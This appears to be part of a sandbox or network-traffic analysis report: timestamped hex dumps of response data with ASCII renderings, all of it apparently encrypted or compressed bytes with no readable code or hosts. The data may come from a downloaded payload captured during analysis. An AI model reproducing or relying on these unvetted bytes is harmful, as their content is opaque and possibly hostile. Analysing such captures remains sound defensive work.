                                                                              Data Ascii: .w5K6[AOll\w2 NwZ&c|:w-#k-wio-Ki8O]>Wbl>G{78zl|/.IzUb%hD8yt@xb*R(NoU{K(yDAc!k#Y/@wFKbI<3kv:l*cDrK5c7Aa%`' nM?3Wo
                                                                              2023-10-26 07:45:58 UTC335INData Raw: 6a 3c b0 d5 60 69 d8 3d f4 31 34 af 98 35 94 13 93 62 fe 49 c8 6d e0 b4 e0 a4 b7 5e f4 42 0e 35 da 21 47 f1 7e 4e 26 78 c6 a6 4d f8 87 aa a6 7d f4 0f 52 17 73 90 16 c6 e3 61 f3 1f 9f 35 88 f7 84 63 ea 26 d7 29 1c 38 0b 0f c1 8e 80 23 7d 76 b4 65 69 3c ed d1 98 c3 d8 0b e8 7c 54 c7 36 11 cd 19 d4 62 ca 61 0f e1 7d 76 9a 65 55 5f ed c9 67 bd a1 aa f4 f6 82 ff da 67 24 78 9c ee 00 eb c5 73 a3 b6 f4 26 d8 2b 52 0b 13 74 c1 61 7e 75 4a 9d c5 2e c2 fd e9 bf b4 86 c7 76 de 5f 2b b8 d7 14 70 86 06 99 ac f7 10 18 93 a0 5d ce 05 96 cb e4 82 4c 8e c2 fb bf 95 58 1c 78 5f e5 94 cb dc 3c f5 ee f4 1d 04 50 4b 42 75 85 20 69 da 29 a6 b1 b9 a5 8d 90 3b 26 ee 94 c9 bb c6 cd a2 7f e0 61 d8 2b c3 fb b2 49 37 62 41 9c 1c fd a7 b8 24 a3 ea bd 77 a2 0a 05 95 d6 7c 78 4d 1d 49
                                                                              Data Ascii: j<`i=145bIm^B5!G~N&xM}Rsa5c&)8#}vei<|T6ba}veU_gg$xs&+Rta~uJ.v_+p]LXx_<PKBu i);&a+I7bA$w|xMI
                                                                              2023-10-26 07:45:58 UTC351INData Raw: ed 04 02 e1 71 35 68 a0 8e fa b0 6f d0 a9 20 19 f5 89 1f 64 34 6e 26 1e 65 13 e4 70 81 6f 2a ee 67 91 03 c6 e0 61 8e 37 ec a5 4d 86 74 6d ea 9b af 88 8c 50 84 05 f3 77 bf 9b 14 7d b8 93 7e 67 f4 d0 75 47 0f bf 8c 7c 47 67 79 26 01 8f 0c b8 d3 45 5e 16 f4 93 7f 34 78 32 64 c1 16 63 8f a0 2d 87 04 1a 9f 71 2a 47 f4 ec 3c 93 fd 8a b8 c9 25 64 c2 fe 10 12 b2 1a 54 6d 06 0b f4 e7 3d 45 e8 6a 8b 53 e9 5e 95 c8 b1 e1 14 b8 21 cb 85 ef f4 f4 5c ee e8 fd 79 e2 6a 59 c7 d6 d0 6c 84 b2 74 e1 ee e5 44 3d c7 cb f4 4d dd 8c 75 c5 8e 38 be 61 83 12 36 21 36 a6 40 b5 e9 c9 fb 38 c6 66 a7 97 1a 00 d5 61 29 7c 1c 16 fc ec 01 b9 82 da f4 20 08 a5 69 7d 1c 17 50 62 64 f7 f1 42 c6 3a 2a 07 eb b0 3f 6e 65 48 c2 a5 5b 78 02 ff f1 b7 d7 9e 91 cd 43 4e 6c ab f4 d0 8a eb 9f 15 5e
                                                                              Data Ascii: q5ho d4n&epo*ga7MtmPw}~guG|Ggy&E^4x2dc-q*G<%dTm=EjS^!\yjYltD=Mu8a6!6@8fa)| i}PbdB:*?neH[xCNl^
                                                                              2023-10-26 07:45:58 UTC367INData Raw: b1 8f d3 18 46 8f db 99 55 62 e3 79 0b ab 89 96 74 86 ba bc c6 87 d7 9a 98 98 ea a7 da 4c 39 e8 e3 7a 9f 27 f1 a1 d2 fc 25 bb 72 2d e1 69 e7 e6 17 2b 01 2f af 61 28 ca 92 91 74 65 b1 7f ea 99 d8 d3 db 03 46 32 9c 77 23 8c 1d c1 a1 1b f4 be c9 86 e6 52 25 5e 34 b1 c4 40 6b 61 eb ae e0 4c f6 8f 3b 3b 0b 67 60 bd e2 24 1b bb 84 d7 a1 2c 09 2e a0 fa 72 f1 95 d9 0c 42 30 6e 60 5f 21 1a 94 a2 7a 79 9c d7 1f 4e 3e 74 ea b5 14 b3 02 65 22 e0 b5 77 2d ad e2 d5 5c b8 89 41 e1 0b da 68 f4 f2 27 17 2c 8b a6 8d 0a ee e0 77 87 04 44 a4 8f 64 ea 1c 7b 87 1f 84 0e 70 da 72 bb df f3 cd 74 6a 38 67 27 08 ea 1d f8 3d 29 8e a1 0e 37 0b f1 7f 12 88 74 f0 76 3e df 21 67 16 ef 45 22 68 58 36 2b 8a 8c 14 37 7f 11 34 b2 2f 83 72 41 91 1f be ea e1 87 9d 9c 79 f7 a1 5c 77 34 ed 4c
                                                                              Data Ascii: FUbytL9z'%r-i+/a(teF2w#R%^4@kaL;;g`$,.rB0n`_!zyN>te"w-\Ah',wDd{prtj8g'=)7tv>!gE"hX6+74/rAy\w4L
                                                                              2023-10-26 07:45:58 UTC383INData Raw: 87 e7 dd f7 4e 62 93 83 f6 b7 ab 6b c5 53 ba a1 f4 5a 3e dd c0 43 ab 06 63 62 f9 84 47 ac 7e 2d 09 d8 b2 60 69 63 be 4f db 7e 22 bf 28 b8 5f 78 48 f4 bb c2 fd ed 5e 51 f4 c2 02 13 57 90 98 83 fe 3d 7c 34 d2 5d d7 87 df 61 7c 99 c4 ed e9 8a 84 c7 e9 c9 fd 73 8e 89 6b d7 4a a8 17 70 a1 b0 28 20 0b 61 ee 8b ce 9a ed 2b 29 2b 38 02 db 4a 02 81 d4 77 61 b0 af 82 99 72 38 3d ca 60 e3 75 da 7c 2a 19 d7 fc eb 3b a6 80 97 74 f4 3d 90 8e 06 56 0c 71 f4 74 b4 fd 5a 02 56 0f c6 61 0d 9e ad 39 42 06 86 1a eb 61 e7 f7 dc ac 4a 02 ed 77 be af 2c ed f8 0a 88 4d f4 b2 e3 dd 65 dd 2d 66 a2 61 e0 a5 7a 85 3b 5e 9b d7 ea 71 30 be 1e 0f 9d 0d 0c 78 21 05 ad 4a 55 c2 1d a1 f5 d6 16 df a0 01 58 f1 78 ab 74 78 bc 90 3e 9c 46 cf 55 fb 18 95 82 80 e6 fb ea c1 ee 69 91 d7 64 62 09
                                                                              Data Ascii: NbkSZ>CcbG~-`icO~"(_xH^QW=|4]a|skJp( a+)+8Jwar8=`u|*;t=VqtZVa9BaJw,Me-faz;^q0x!JUXxtx>FUidb
                                                                              2023-10-26 07:45:58 UTC399INData Raw: 49 2f a8 28 42 28 eb 15 17 22 cb 59 71 10 55 78 58 59 3f 4b 0f 66 ab fd f4 89 43 6c e9 aa 02 34 7c bb 1c 78 94 63 8b af ed 1e f9 66 f6 ac f1 86 da 28 01 c0 d4 ea 1a 83 30 63 f5 34 82 8d ed e3 bb 2e dd c7 8b 53 ea 16 e5 07 3a 5d 5e 47 a5 7e bf 58 7e 3e f5 51 8a 3b a3 9e e9 8d 73 36 94 31 47 9d 3e 72 2a 62 62 61 64 b5 63 79 7a d4 44 02 f4 dc 4a bc d7 e9 f1 29 ba 61 96 43 4e 6d 8d c5 e7 dd ea 2f 5c 29 76 76 03 7d 2a 78 2b d0 30 07 e4 41 84 02 f4 56 86 84 f7 46 0c 30 a5 61 a4 de a4 25 01 ed 5e 93 ea c9 a1 ea 20 bb c9 a4 02 78 60 99 88 75 e9 c3 d6 bf f4 0e dc cb bc fb 0f 6e d5 61 03 59 78 f5 42 4c 89 b7 ea b4 9f b1 51 26 9c 15 bf 77 d8 a5 16 f0 07 10 1f 5e ed 9f 6e c6 44 a2 79 52 40 9f 22 44 cd 61 ce fe 13 ca e0 91 14 bb ea b6 c3 4e 71 41 c4 d4 77 9d 4c 10 59
                                                                              Data Ascii: I/(B("YqUxXY?KfCl4|xcf(0c4.S:]^G~X~>Q;s61G>r*bbadcyzDJ)aCNm/\)vv}*x+0AVF0a%^ x`unaYxBLQ&w^nDyR@"DaNqAwLY
                                                                              2023-10-26 07:45:58 UTC415INData Raw: bc 15 9f 77 25 ee 2f 24 05 73 ef 5b a9 eb c5 fa db 0d 8b a0 eb 6b 7e 76 84 a2 04 85 f4 e0 e6 8e d8 1e eb 7b 39 95 51 f1 2d 54 0f 78 cc 0b 5d 42 68 cc b7 ad f9 c1 b8 80 72 6b 89 7f 8e 9f ca 71 31 63 2d 78 d3 38 99 f5 c6 53 66 e9 f4 b6 d3 13 d4 34 a9 ba 3a aa 25 96 f1 11 d2 0e 28 9e 4a 5d 75 9a e5 b0 71 e3 64 64 34 68 95 87 70 c3 a9 77 95 cb 92 bf be 06 af c4 f4 d1 aa 57 28 4c 38 f3 a3 62 b4 f8 74 58 41 9b 58 a2 95 8f 15 37 00 b3 5a e2 09 e9 6b 47 5d 5e bf b3 aa 97 1f e1 9a 73 18 3c e3 0e f1 63 5d ff 8e 1a 01 d0 27 80 b1 c6 74 13 7b ba 00 54 7f 9a f4 dc 88 6b 30 b2 03 c2 09 aa d4 ce f4 f9 33 1d d7 56 18 36 f4 7a 63 b6 af 3e 3e c1 de 61 5c 8a 67 46 1d c0 34 4d f5 0c 79 73 e5 37 da 90 1f 80 3c 69 1e 52 d4 3e 53 98 65 a4 b5 45 f4 31 e6 9b eb 81 0e 99 94 62 ef
                                                                              Data Ascii: w%/$s[k~v{9Q-Tx]Bhrkq1c-x8Sf4:%(J]uqdd4hpwW(L8btXAX7ZkG]^s<c]'t{Tk03V6zc>>a\gF4Mys7<iR>SeE1b
                                                                              2023-10-26 07:45:58 UTC431INData Raw: 4b e3 e0 89 4e 94 f4 c2 6f a1 b3 17 9f e0 1d f8 c8 64 02 c6 c6 a7 37 54 07 5c de 20 ed fe e6 9b 53 9d 03 f8 7e cb 64 a9 57 bf 6f 54 f0 05 d4 77 15 09 a9 eb d4 75 ed 84 28 21 b8 3d 74 88 12 33 ea 61 6f 26 07 33 c8 d7 24 7c ea ad 36 37 80 a0 14 b4 c5 64 77 16 e9 12 0e 72 63 b3 d4 71 0b ac f3 7d 5d a9 48 86 32 b6 d4 4f c0 77 34 a2 53 c4 97 e6 c0 4c 4c e5 eb 3a 47 41 95 2f a4 fe 77 94 d5 80 f6 08 74 23 fe 1c 39 27 44 f6 f4 b9 57 d6 b1 aa 52 d1 22 7b 56 29 74 d6 8b 36 97 d4 c7 4f f4 38 44 71 e8 d8 d5 be de 61 4f 5b 28 10 aa 46 a9 44 eb f3 44 2b 37 f2 26 3b 86 87 b2 36 e1 f7 f8 bc fd 07 6d 01 eb 3e c1 ee 4b 0d 7f e2 ef 77 17 37 1a 6e aa da 6c 87 e7 de 11 f1 b3 f2 81 4f 25 69 ca 01 f2 61 62 e3 6f 3a 01 be 94 66 ea 6a fe fd e1 8c c2 c8 92 76 e3 51 40 86 e6 20 22
                                                                              Data Ascii: KNod7T\ S~dWoTwu(!=t3ao&3$|67dwrcq}]H2Ow4SLL:GA/wt#9'DWR"{V)t6O8DqaO[(FDD+7&;6m>Kw7nlO%iabo:fjvQ@ "
                                                                              2023-10-26 07:45:59 UTC447INData Raw: 34 78 bf 5b d4 e1 aa 38 83 82 e8 a9 98 ba 15 f9 64 29 2b 50 b4 9a 93 b8 c1 d9 70 d8 14 ff c9 8f 41 51 fb 57 1d af f8 17 f4 d4 99 63 8e de ac 6a f4 a3 7e 52 4b c3 07 18 9c fa aa 40 69 42 a3 37 cf 03 06 08 74 b9 7a 69 58 79 a2 23 d4 22 8f 52 43 fc d8 f4 32 22 cb 49 59 f5 7a f8 14 cb 78 da cb 23 32 18 74 08 14 04 14 e3 45 e3 06 ca 2d c1 ab 41 7a 0b f3 ad 01 d1 79 aa f7 38 04 da 37 73 d2 80 d2 d2 f2 21 66 56 13 84 67 f9 14 02 7c 7d 03 ba 94 60 4c 22 74 58 c4 fa db 6e b3 09 e6 b7 94 90 74 08 f4 52 93 f1 82 66 8a d9 6d a2 ff 7c 97 0d 6a b8 87 bc 1a e8 63 65 a2 53 7d dd a1 61 7f 67 80 17 7f 68 2a 06 19 20 51 69 ef a9 85 65 c2 ed 6a e1 7c 87 37 34 98 a4 f4 f1 1b c9 b8 71 54 fb 4a 38 fe a1 b8 56 f2 3c 7a 5e d2 78 cb 37 82 7c c9 7c 0f 4a 7c 6e c1 e6 da 6f 54 0e eb
                                                                              Data Ascii: 4x[8d)+PpAQWcj~RK@iB7tziXy#"RC2"IYzx#2tE-Azy87s!fVg|}`L"tXntRfm|jceS}agh* Qiej|74qTJ8V<z^x7||J|noT
                                                                              2023-10-26 07:45:59 UTC463INData Raw: 34 c7 93 71 74 f7 6a 78 bc f5 05 2a b8 06 2b 22 e1 86 cf e1 d3 a1 61 63 03 25 0b 58 8d 64 fc 99 70 8d c7 ec 70 42 91 d6 72 c2 0a 25 72 02 4a 56 1b b7 8d f8 87 e3 8a 04 15 c4 0a 87 af 0c ab 1d 83 72 3a e2 07 54 c8 ef 0b e2 2a 6a 65 d3 54 21 b9 fd 82 d8 73 e6 14 1f 82 82 4a dd 5f 3a 4b 8c fe 9e e1 f7 e7 58 b2 37 14 92 77 6f db dd f4 60 49 f9 bc fe 76 d5 ba 2c 95 7c cb 7c 62 85 cd df 06 51 09 b8 08 6b be 97 62 cc 51 b8 13 be d8 48 46 aa aa 49 e2 57 85 18 14 67 65 a2 14 ae 96 98 f9 8d 9d 78 6e 82 08 72 e2 dc ab 1b 8c 42 dd 20 15 3a eb 78 c0 87 a5 68 11 c5 ca 83 13 67 0e 2a 00 a0 fa 72 7b 5e c4 97 ed cb e3 4c c3 8c cd 89 48 5d 02 85 c3 6f a7 b7 03 c2 8c 00 5f bf 3d 24 34 9a ae 7c 4c fb 06 97 3a 62 ea ff 09 d6 86 15 3d ed fa 08 6e 64 4e 2f d8 ac b9 1c 34 ec 0a
                                                                              Data Ascii: 4qtjx*+"ac%XdppBr%rJVr:T*jeT!sJ_:KX7wo`Iv,||bQkbQHFIWgexnrB :xhg*r{^LH]o_=$4|L:b=ndN/4
                                                                              2023-10-26 07:45:59 UTC479INData Raw: 51 c1 73 f8 b9 b0 69 e0 74 62 3e cc d4 b7 cc 2c 08 71 7e 15 d1 43 5e f8 0a 2a a7 37 6d 43 44 f4 33 4b fb 75 bf a1 36 c4 ce e1 04 98 b9 f5 2a 38 4b 94 b3 f0 53 bc 4e 98 62 62 8b 45 ac b9 09 3d 5f 7f f0 a2 20 51 cd 37 32 dc bf 77 c5 85 8d 8f de c8 e4 9c de 52 3f 3d f4 24 1a e2 74 22 03 92 39 9d 3c 94 54 70 0c a7 fc 02 fe 37 32 1a 13 98 f2 85 d4 52 2d 3a 5a b8 37 7d 56 98 34 5b fc 47 6d cf da ac a7 be d8 5e 36 ff 4a f8 5c 3e fd 26 18 80 43 b4 da af a0 79 b7 d4 f1 1e 34 c2 3b 0f d5 c9 aa f7 49 f8 6b 5c 13 86 50 0e 74 62 84 26 04 a1 75 7f 85 a2 0a f7 15 63 45 d0 63 c1 06 41 7a 43 ce ac 73 b3 ea 9b d7 7a d8 90 6c ca 3f 78 94 65 c3 f3 9c a1 5d 7c d4 bc ea d6 f6 cd 66 34 f2 b9 b4 11 62 bc 0c 3c 14 7f 55 09 ba 3e eb 6f 2f ce bd 77 06 3e f9 1d 3b cb 88 d7 bf a2 2a
                                                                              Data Ascii: Qsitb>,q~C^*7mCD3Ku6*8KSNbbE=_ Q72wR?=$t"9<Tp72R-:Z7}V4[Gm^6J\>&Cy4;Ik\Ptb&ucEcAzCszl?xe]|f4b<U>o/w>;*
                                                                              2023-10-26 07:45:59 UTC495INData Raw: 20 42 80 bf 71 f1 2a 63 d5 ff 11 06 a0 f9 4a 0c b4 41 02 f0 53 de 6a 63 27 6b bd 51 4b bb ea 57 f5 c8 02 30 f9 f3 c4 93 ad 1d 2b 7b 00 37 75 89 40 40 68 38 85 36 ab a8 90 de f6 f0 b9 c6 56 18 ef 8b a8 fc 10 2b 8b 67 83 02 04 ef 74 6b 3b 7a 83 22 cb 88 97 9e b8 77 f0 0b fa 93 f9 34 6b 54 db 27 dc 69 55 62 ca 63 36 dd 33 30 64 89 af ad 8c a2 6a 5a 77 23 bc 16 5f 9b 2a 8b 5e 41 f3 97 76 ab 6d 89 81 0e 2b 70 ef 3f b4 f7 05 e2 68 3b 8d a9 f1 27 7f 8b 6e 9b b4 4a 24 61 76 30 68 66 74 76 be 00 93 e0 be f0 62 e2 9a e9 34 07 ee 08 98 d7 b8 2a 8c e2 db 6b bd 62 ca f2 d3 6b 9d 22 7b 02 46 18 05 f5 ca ef be 9f dc 0f 43 50 2b d8 7a 9d 1f ef 73 a2 56 8d d0 71 8a d7 0f 86 bb ab 14 ee 84 59 fc 72 c6 9f b9 ec 3c 38 a6 a5 2a 6c 7c e2 8a d5 0b 4b b0 02 4c c2 6f 15 f2 81 77
                                                                              Data Ascii: Bq*cJASjc'kQKW0+{7u@@h86V+gtk;z"w4kT'iUbc630djZw#_*^Avm+p?h;'nJ$av0hftvb4*kbk"{FCP+zsVqYr<8*l|KLow
                                                                              2023-10-26 07:45:59 UTC511INData Raw: 60 b1 72 cb 5e a6 9f ce bc ef 6a 31 14 15 83 5f 15 ed 9b d7 34 4b bc 2a 16 aa a7 d7 c1 ad 7b e2 fb 4d ae 8f cb 41 e2 e5 34 e2 bf eb d4 67 63 4a d4 91 d8 97 14 58 d1 68 1d 50 08 f8 66 d4 ed a8 74 7f ed 12 be 32 23 90 54 d5 ee 17 53 6a 50 f5 34 66 66 f9 41 a7 a2 23 54 30 7a e8 04 cd a9 51 3d c8 14 03 a5 01 2c 58 62 a3 bb cc 8f a2 06 bd 54 69 0a e1 6b 97 74 e8 14 80 0d 95 1b 28 0b 3b 9f 8e c0 a3 34 4d c5 97 c0 a3 f9 87 7f 88 9f 9f 14 24 7f 6a d8 a0 b0 37 27 46 4b 93 05 2c 0b 42 97 62 08 55 5d a1 60 38 b3 7d 93 63 4c c2 e8 6c 8a d3 e3 79 a8 81 71 cf 77 5f ea 08 1b 0d 08 3d 10 7e d8 d8 c4 61 07 a3 cb 51 0e ee 18 87 b4 24 0d a2 b7 1a b0 a7 2d d7 78 a2 45 39 16 9e ea 2b 77 53 73 e6 13 83 a6 3a 1a f4 e9 82 98 8e 0c 9a ff 63 f9 65 59 58 b3 b4 3f d8 4a 23 c7 ef 00
                                                                              Data Ascii: `r^j1_4K*{MA4gcJXhPft2#TSjP4ffA#T0zQ=,XbTikt(;4M$j7'FK,BbU]`8}cLlyqw_=~aQ$-xE9+wSs:ceYX?J#
                                                                              2023-10-26 07:45:59 UTC527INData Raw: 7f 0c 4b b0 e2 38 84 3d 34 2d 09 d1 54 6d 38 62 2c 41 e3 f7 95 ca 6d 89 53 87 0b 41 74 62 14 49 96 b8 55 a2 8a c2 5e 38 c0 31 b9 f7 62 58 7a f8 f4 8b ae 60 a1 79 a2 75 f0 de bc b7 79 76 91 a5 04 22 70 6d b6 1b e5 b7 bb 2c a9 bb 54 89 cf 93 92 02 38 df 9d c2 0a db 04 a2 92 8b 66 86 00 80 d4 37 57 67 a5 d2 32 18 17 ee ad d8 37 28 00 dd 74 87 ca 11 76 a2 29 52 6b 4f bc 78 78 9f 13 f0 54 b7 5a 38 0d 4a 3a a9 74 55 e3 e5 e7 81 d8 10 4a 15 6b 6d 5a 75 23 09 94 bb 08 38 dd 5a 45 5d 34 50 19 d8 cc 51 6e 1f 79 3a 56 48 dd f6 a6 37 b0 93 10 8f 1c 4b 42 d8 de 7c 41 96 b6 e1 13 c8 70 a9 3e 79 51 e6 b1 9c d9 45 0b 3b b4 3d 81 29 6b a2 d0 d2 e4 df aa ae 70 a9 4b 59 db 42 f3 15 b4 46 7f 2a 78 36 6d 90 87 58 66 17 49 70 ea de 30 16 d0 b7 f4 f6 59 0b a5 3d eb d7 74 2d ba
                                                                              Data Ascii: K8=4-Tm8b,AmSAtbIU^81bXz`yuyv"pm,T8f7Wg27(tv)RkOxxTZ8J:tUJkmZu#8ZE]4PQny:VH7KB|Ap>yQE;=)kpKYBF*x6mXfIp0Y=t-
                                                                              2023-10-26 07:45:59 UTC543INData Raw: 77 68 ac 40 34 83 4e e5 69 f2 e6 cd 34 62 8a d5 a3 79 a7 f2 10 65 66 f8 f8 38 b7 f8 02 6a 48 aa 12 b2 ef e6 45 b7 d9 d7 14 3b 94 c4 13 ac d8 f6 f7 1e ee b7 32 1d 86 78 fc 4e 4a b3 78 ee cc b7 d0 54 62 45 61 22 8b 93 8b ba ed 60 ba 08 da 00 80 22 ff fb 15 85 06 a2 d4 00 19 d8 5d 1e cb 31 74 9a cf 5b 5f 4d ab cb 30 63 53 94 94 25 06 a0 68 db ef 02 b4 01 7a 6c b2 33 13 73 b5 51 c9 7e 74 16 a4 8e 17 70 ea 57 82 85 01 1e 0d 34 ba 9d 41 34 cf 07 74 a0 94 d0 34 70 7c 6c b4 83 b3 7b 76 c2 ca 74 c5 80 e9 3a 62 42 6e d3 41 22 9b 57 a7 6a 01 99 ec b9 1d b1 74 f7 03 ec 74 19 b7 de 34 aa 01 7c b5 ab 71 22 5a 63 8a 09 09 9f b9 61 f1 c1 ee ef fe 43 df 1f 54 9e d7 69 e1 39 75 86 f4 e6 cb 75 df 10 7c 18 16 b6 ca 61 7c d0 53 9b 8f 3e 0b 18 63 de 6b e0 82 22 e1 a0 9e ed 6a
                                                                              Data Ascii: wh@4Ni4byef8jHE;2xNJxTbEa"`"]1t[_M0cS%hzl3sQ~tpW4A4t4p|l{vt:bBnA"Wjtt4|q"ZcaCTi9uu|a|S>ck"j
                                                                              2023-10-26 07:45:59 UTC559INData Raw: f4 a5 a3 5d f9 ac 81 80 de 9e 4a 18 59 2b b5 90 24 a2 f3 3b 43 8e f6 3e 14 64 af 97 50 14 3b f8 42 18 16 a7 28 62 aa 94 81 58 a0 d7 4e 33 03 0d 3b a2 a2 c5 bd 49 6b 6b 9a 6d 76 1f fe 9d 6a 7b c4 88 d7 e8 08 87 a0 72 17 cd 78 ff d4 f1 24 98 b7 fc f6 b7 08 6b 39 d6 f2 b4 9e 37 79 3b 79 ca 14 44 6d f8 2c c2 0d f9 72 26 6b 45 11 22 eb 02 a0 87 2b 1f 05 43 cb ec b4 0d 69 8f 6d 00 6b 0e 73 4d b2 d7 bc 1f 6b 3c 80 ab 06 cf 4b a2 67 39 7f e4 5b f4 63 82 53 6c 85 c0 5c bc 9b a2 ea 1b f1 a3 f9 a5 17 3c 07 9c b4 b4 4b 58 c4 c8 a4 39 4c 82 74 84 d2 81 37 42 b3 5c 3f 6a 54 5e bf 01 66 8d aa 59 a6 ac 66 0c af 9f cd e3 94 ec 97 e1 e1 fe 54 f9 34 1d 5f 70 2d db 4a 71 67 73 23 10 54 ae 03 e4 54 6d 70 2e 39 e2 38 16 f3 32 2d dd 70 e3 b7 7b ad 22 cb 90 02 bd 48 b8 e2 3e 12
                                                                              Data Ascii: ]JY+$;C>dP;B(bXN3;Ikkmvj{rx$k97y;yDm,r&kE"+CimksMk<Kg9[cSl\<KX9Lt7B\?jT^fYfT4_p-Jqgs#TTmp.982-p{"H>
                                                                              2023-10-26 07:45:59 UTC575INData Raw: a3 11 40 8f 5d b7 68 78 10 a0 29 47 3b 7c 95 98 61 3c ab 97 a4 f7 d5 a7 1c d9 ca 97 12 3d e9 e6 0f 34 df 3c c4 c1 aa 2c 08 59 37 10 a2 3b 27 f8 c4 d6 0e d8 aa 26 15 d5 14 89 42 2d d3 21 4e 56 14 e2 61 a1 33 02 2b 9c 0a 64 a8 55 d5 72 52 ed cd 01 0d d8 d2 2d 00 71 25 3c ab 35 57 4e 0b 57 51 32 0b f8 74 77 a5 35 05 0c 5a 38 40 a2 01 f8 ac 6e 99 17 04 f1 8b 47 50 3c 0b 18 62 dc 43 32 17 3a ab f0 4b 97 30 f8 bf 85 8a 48 02 3b cf f7 85 a0 2a a6 12 34 cb 57 65 b3 5c 78 d0 a3 a9 67 91 35 fa 8b 85 2e cb c8 5f 19 92 b8 70 82 da 23 09 e7 1a 31 cc e9 3f 17 70 ac 7c e0 34 6b 65 8d d2 96 1a b8 54 ef 13 b6 79 98 ea f0 ea 1f 3c d8 d4 50 04 07 72 89 17 41 63 02 0e a5 1e bc 32 58 53 56 83 7d 08 22 d8 68 2d 37 eb 65 50 82 4b 8a d7 fd d3 e2 4e 82 0b e6 46 c2 c6 59 94 b4 0a
                                                                              Data Ascii: @]hx)G;|a<=4<,Y7;'&B-!NVa3+dUrR-q%<5WNWQ2tw5Z8@nGP<bC2:K0H;*4We\xg5._p#1?p|4keTy<PrAc2XSV}"h-7ePKNFY
                                                                              2023-10-26 07:45:59 UTC591INData Raw: 57 97 42 0f 1e 42 01 f9 1a 9e 14 a5 df ab ca d7 73 6d f7 60 ff 85 a2 2f dd c7 89 92 de c1 80 f0 d4 18 f0 f9 76 e8 47 5a d4 76 45 8a 2a 82 f1 bf 69 f1 76 41 14 c4 ae a4 1d 63 78 f0 68 ad 00 78 b4 de 7b 1b ee cb 0d c8 3b 33 eb 78 86 e2 43 c1 a8 51 0e 38 ae 2c b1 eb 0d 62 9c bb 8b 32 2b b7 a8 5a 03 5c 03 94 0d 35 d4 60 40 1f a0 21 f3 0a 45 a2 c7 61 50 15 d2 c8 73 1a 2b 3d 55 50 b3 b7 d0 3e f0 e7 46 72 ad 7a 79 65 0e b0 14 ae 4b 8a 89 54 99 95 3b c2 0e 58 51 b9 f9 df 14 82 66 d3 f4 3d 78 7c a3 d9 c7 c3 7f ad a9 96 1f e2 ed f7 d4 46 69 78 9f 52 49 78 04 4f 01 da 2f 97 3a 78 13 18 cd 72 4b 31 21 b8 0e 11 71 78 0e a2 f1 ca 22 4a 8b 99 7b 87 ed 15 b3 81 d3 c3 c1 8c ec db a6 c3 32 27 b3 d8 1d f0 94 48 0e 7a 94 4d 19 a4 14 07 3b 58 0f 3c 4f 22 94 88 6f 77 74 86 aa
                                                                              Data Ascii: WBBsm`/vGZvE*ivAcxhx{;3xCQ8,b2+Z\5`@!EaPs+=UP>FrzyeKT;XQf=x|FixRIxO/:xrK1!qx"J{2'HzM;X<O"owt
                                                                              2023-10-26 07:45:59 UTC607INData Raw: a0 21 eb af 1b f5 0c 4e ed 79 12 27 7b bf dc eb 6d 82 f6 42 48 a2 e8 e6 48 be d4 b7 56 b7 d8 5e 0b ed c2 57 f4 e4 d3 7e d0 39 f8 35 eb 62 58 fd 00 3d e3 4c f7 cf 82 18 64 f7 ea 58 8c 61 c6 75 0b b9 5b aa 94 6b dd 55 4b 02 ab 37 1b aa ef 3e d8 65 63 2d 10 a2 da 86 d0 c1 ea 7c fc ed 6f af 83 82 08 46 e8 7b 07 1f 74 34 84 97 00 b9 b6 35 7b 72 2a 2a fa d7 84 f8 b1 72 ab e6 04 f5 f5 22 e7 86 03 4f 48 62 57 48 31 82 09 64 b4 7d ed 3c c3 6e 57 d3 7b c2 ce d7 ae 58 58 47 f5 24 6b d5 2c 3b 01 60 f4 84 04 8f 95 86 56 55 14 be fd 7a f7 43 04 a2 85 35 29 29 54 a9 14 fd 6c 02 f4 98 7a c3 e2 6e 3c 62 fe 47 1c 02 78 34 f6 e1 06 6d 54 e2 06 ab 07 41 c5 d7 10 db 80 0c f2 97 b8 89 67 b7 49 d8 44 d0 2a b8 1c eb 75 98 5f 9a 74 16 de 82 1c 85 44 64 07 eb 12 14 c2 17 74 03 51
                                                                              Data Ascii: !Ny'{mBHHV^W~95bX=LdXau[kUK7>ec-|oF{t45{r**r"OHbWH1d}<nW{XXG$k,;`VUzC5))Tlzn<bGx4mTAgID*u_tDdtQ
                                                                              2023-10-26 07:45:59 UTC623INData Raw: 4a 69 9b 10 12 72 fb 50 9d c5 aa 2f 69 c2 0b 36 ac 41 b7 87 2f 70 0a a1 fb d8 7a 98 e8 dd 0a 8a b1 4d cb 75 15 93 5d b8 91 ef c8 59 48 66 6c 18 40 13 d7 d2 5c 22 79 2e ec 14 cd fa 14 a2 5d 5d 4c e8 3d dc 14 c7 54 a8 74 95 d7 46 6f dd ea 37 93 da ca 63 52 58 71 8a c4 05 cb 72 f3 c4 a3 20 70 de aa ee b2 e1 c3 38 f4 77 54 99 f4 c1 ca 1b 44 ac fd b7 b4 63 a8 71 87 ae ca 70 0f ad a2 62 b4 01 9a fa 4d cc 0b f8 ec 51 da ef ef 87 6a 76 90 90 cf 7e bf c1 aa 5c 4a 6a c4 53 51 7e 0b 46 f4 69 de 9f 74 39 8f 4e 16 35 fc 77 a4 ab ff 9b 98 9b fd 4b eb e6 ec d0 34 81 ca 97 51 26 35 ab 0c e7 ca 79 74 5f 9a 76 d4 c1 84 53 f4 76 06 55 0b 0b 5a ac c4 f9 6a 0f ab e1 4e 20 5a 42 6b 1a f9 df 86 1d b8 17 8b b1 bd e4 4a d7 6c 0b ac 0f d6 eb 0a 73 b1 a3 7e 4f 64 a2 bc 51 b8 3c c9
                                                                              Data Ascii: JirP/i6A/pzMu]YHfl@\"y.]]L=TtFo7cRXqr p8wTDcqpbMQjv~\JjSQ~Fit9N5wK4Q&5yt_vSvUZjN ZBkJls~OdQ<
                                                                              2023-10-26 07:45:59 UTC639INData Raw: 4c a2 0d be 72 02 e9 e8 14 04 11 a9 eb ac b8 57 74 bc 05 9b ba 88 3f f8 14 20 5b 9f 5e 42 0c 47 e4 41 04 dc 84 62 fa 8e 8c e2 40 72 5d d7 e8 57 07 30 2b 18 df f7 5d 4a 94 3a 1d 0a 51 92 22 98 fd 6b 8e 04 00 ae ca 77 0a 01 00 99 08 e1 0d f1 23 3a eb 0e c7 81 4a 6c d0 da 51 37 63 ae ea da 34 5a 76 38 c9 82 6a 93 fb 3c 17 98 75 b5 2a 37 14 c8 d7 12 5d 21 e9 d7 b9 e5 49 f8 5a b2 13 11 f5 71 24 18 71 84 15 3b 6d 22 2b 5b a6 f8 c4 b7 72 a9 14 fd 9b 37 ef 57 c4 00 52 58 47 17 c2 88 97 2e 06 18 dd 6e 9c 78 f4 04 f8 45 be 85 8a d9 55 50 bd 77 ec 78 9a 90 71 